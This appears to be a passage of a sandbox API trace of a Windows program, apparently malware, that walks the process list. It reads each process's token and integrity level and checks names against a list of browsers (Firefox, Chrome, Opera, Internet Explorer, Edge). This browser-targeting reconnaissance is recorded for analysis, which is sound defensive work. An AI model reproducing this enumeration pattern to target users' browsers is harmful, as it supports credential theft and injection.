dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">_") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0470.253] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0470.253] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0470.254] GetLastError () returned 0x7a [0470.254] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0470.254] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0470.254] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0470.254] CloseHandle (hObject=0x3bc) returned 1 [0470.254] CloseHandle (hObject=0x5a4) returned 1 [0470.255] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0470.255] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0470.255] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0470.255] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0470.255] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0470.255] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0470.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0470.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0470.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0470.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0470.256] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0470.256] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0470.256] GetLastError () returned 0x7a [0470.256] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0470.256] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0470.256] CloseHandle (hObject=0x3bc) returned 1 [0470.256] CloseHandle (hObject=0x5a4) returned 1 [0470.256] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0470.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0470.257] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376f10, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">`") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0470.257] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0470.257] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0470.257] GetLastError () returned 0x7a [0470.257] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0470.257] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0470.257] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0470.257] CloseHandle (hObject=0x3bc) returned 1 [0470.258] CloseHandle (hObject=0x5a4) returned 1 [0470.258] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0470.258] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0470.258] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0470.258] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0470.258] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0470.259] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0470.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0470.259] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0470.260] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0472.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa798) returned 0xc0000004 [0472.272] VirtualAlloc (lpAddress=0x0, dwSize=0xb798, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0472.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb798, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0472.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0472.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0472.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0472.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0472.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0472.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0472.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0472.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0472.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0472.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0472.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0472.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0472.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0472.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0472.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0472.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0472.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0472.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0472.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0472.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0472.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0472.276] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0472.276] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0472.277] GetLastError () returned 0x7a [0472.277] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0472.277] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0472.277] CloseHandle (hObject=0x3bc) returned 1 [0472.277] CloseHandle (hObject=0x5a4) returned 1 [0472.277] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0472.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0472.277] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3780e8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">a") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0472.278] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0472.278] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0472.278] GetLastError () returned 0x7a [0472.278] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0472.278] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0472.278] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0472.278] CloseHandle (hObject=0x3bc) returned 1 [0472.278] CloseHandle (hObject=0x5a4) returned 1 [0472.279] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0472.279] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0472.279] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0472.279] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0472.279] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0472.279] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0472.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0472.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0472.280] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0472.280] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0472.280] GetLastError () returned 0x7a [0472.280] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0472.280] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0472.280] CloseHandle (hObject=0x3bc) returned 1 [0472.280] CloseHandle (hObject=0x5a4) returned 1 [0472.280] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0472.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0472.281] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375d60, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">b") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0472.281] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0472.281] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0472.281] GetLastError () returned 0x7a [0472.281] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0472.281] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0472.281] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0472.282] CloseHandle (hObject=0x3bc) returned 1 [0472.282] CloseHandle (hObject=0x5a4) returned 1 [0472.283] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0472.283] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0472.283] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0472.283] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0472.283] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0472.283] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0472.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0472.283] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0472.283] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0472.283] GetLastError () returned 0x7a [0472.283] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0472.284] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0472.284] CloseHandle (hObject=0x3bc) returned 1 [0472.284] CloseHandle (hObject=0x5a4) returned 1 [0472.284] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0472.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0472.284] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376520, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">c") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0472.284] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0472.284] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0472.284] GetLastError () returned 0x7a [0472.285] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0472.285] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0472.285] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0472.285] CloseHandle (hObject=0x3bc) returned 1 [0472.285] CloseHandle (hObject=0x5a4) returned 1 [0472.286] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0472.286] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0472.286] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0472.286] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0472.286] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0472.286] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0472.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0472.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0472.286] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0472.286] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0472.287] GetLastError () returned 0x7a [0472.287] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0472.287] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0472.287] CloseHandle (hObject=0x3bc) returned 1 [0472.287] CloseHandle (hObject=0x5a4) returned 1 [0472.287] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0472.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0472.287] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376b68, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">d") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0472.287] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0472.288] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0472.288] GetLastError () returned 0x7a [0472.288] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0472.288] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0472.288] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0472.288] CloseHandle (hObject=0x3bc) returned 1 [0472.288] CloseHandle (hObject=0x5a4) returned 1 [0472.289] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0472.289] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0472.289] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0472.289] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0472.289] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0472.289] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0472.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0472.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0472.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0472.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0472.290] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0472.290] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0472.290] GetLastError () returned 0x7a [0472.290] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0472.290] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0472.290] CloseHandle (hObject=0x3bc) returned 1 [0472.290] CloseHandle (hObject=0x5a4) returned 1 [0472.291] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0472.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0472.291] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376f10, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">e") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0472.291] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0472.291] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0472.291] GetLastError () returned 0x7a [0472.291] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0472.291] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0472.291] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0472.292] CloseHandle (hObject=0x3bc) returned 1 [0472.292] CloseHandle (hObject=0x5a4) returned 1 [0472.292] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0472.292] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0472.292] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0472.293] 